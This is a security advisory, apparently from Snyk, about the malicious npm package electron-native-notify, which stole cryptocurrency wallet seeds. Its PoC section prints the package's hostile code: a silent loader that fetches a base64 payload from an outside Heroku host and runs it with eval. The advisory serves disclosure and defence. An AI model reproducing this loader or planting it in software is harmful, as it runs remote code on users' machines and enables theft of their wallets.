Malicious Package

Affecting electron-native-notify package, versions >0.0.1-security

Report new vulnerabilities
Do your applications use this vulnerable package? Test your applications

Overview

electron-native-notify is a malicious package.

This package contains malicious code and was part of a targeted attack to steal cryptocurrency wallet seeds and upload them to a remote server, effectively giving attackers access to users wallets.

PoC

try {
    (process && "renderer" === process.type ? require("electron").remote.require : require)("https").get("https://updatecheck.herokuapp.com/check", res => res.on("data", d => {
        try {
            eval((atob || (e => "" + Buffer.from(e, "base64")))("" + d))
        } catch (e) {}
    }))
} catch (e) {}

Remediation

Avoid using electron-native-notify altogether.

References

CVSS Score

10.0
high severity
  • Attack Vector
    Network
  • Attack Complexity
    Low
  • Privileges Required
    None
  • User Interaction
    None
  • Scope
    Changed
  • Confidentiality
    High
  • Integrity
    High
  • Availability
    High
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
Credit
Adam Baldwin
CWE
CWE-506
Snyk ID
SNYK-JS-ELECTRONNATIVENOTIFY-174928
Disclosed
05 Jun, 2019
Published
07 Jun, 2019